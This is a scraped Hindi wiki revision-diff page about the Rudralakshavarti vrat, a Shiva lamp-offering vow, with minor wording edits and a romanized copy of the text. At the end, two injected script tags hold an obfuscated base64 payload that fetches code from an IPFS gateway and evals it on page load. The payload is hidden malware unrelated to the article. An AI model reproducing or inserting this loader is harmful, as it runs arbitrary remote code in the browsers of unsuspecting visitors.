Difference between revisions of "रुद्रलक्षवर्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[शिवलिंग]] के समक्ष [[गाय]] के [[घी]] में डुबोयी हुई [[रूई]] की बत्तियों से युक्त एक लाख दीपों का अर्पण करना चाहिए।
 
*[[शिवलिंग]] के समक्ष [[गाय]] के [[घी]] में डुबोयी हुई [[रूई]] की बत्तियों से युक्त एक लाख दीपों का अर्पण करना चाहिए।
 
*व्रत के पूर्व 16 उपचारों से [[लिंग]] पूजा करनी चाहिए।
 
*व्रत के पूर्व 16 उपचारों से [[लिंग]] पूजा करनी चाहिए।
 
*व्रत का आरम्भ [[कार्तिक]] या [[माघ]] में, [[वैसाख]] या [[श्रावण]] में होता है और उसी मास में समाप्त होता है।
 
*व्रत का आरम्भ [[कार्तिक]] या [[माघ]] में, [[वैसाख]] या [[श्रावण]] में होता है और उसी मास में समाप्त होता है।
*कर्ता को [[धन]], पुत्र एवं कामनापूर्ति प्राप्त होती है।<ref>स्मृतिकौस्तुभ (411-414)</ref>
+
*कर्ता को [[धन]], पुत्र एवं कामनापूर्ति प्राप्त होती है।<ref>स्मृतिकौस्तुभ (411-414</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:58, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shivaliang ke samaksh gay ke ghi mean duboyi huee rooee ki battiyoan se yukt ek lakh dipoan ka arpan karana chahie.
  • vrat ke poorv 16 upacharoan se liang pooja karani chahie.
  • vrat ka arambh kartik ya magh mean, vaisakh ya shravan mean hota hai aur usi mas mean samapt hota hai.
  • karta ko dhan, putr evan kamanapoorti prapt hoti hai.[1]

tika tippani aur sandarbh

  1. smritikaustubh (411-414

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>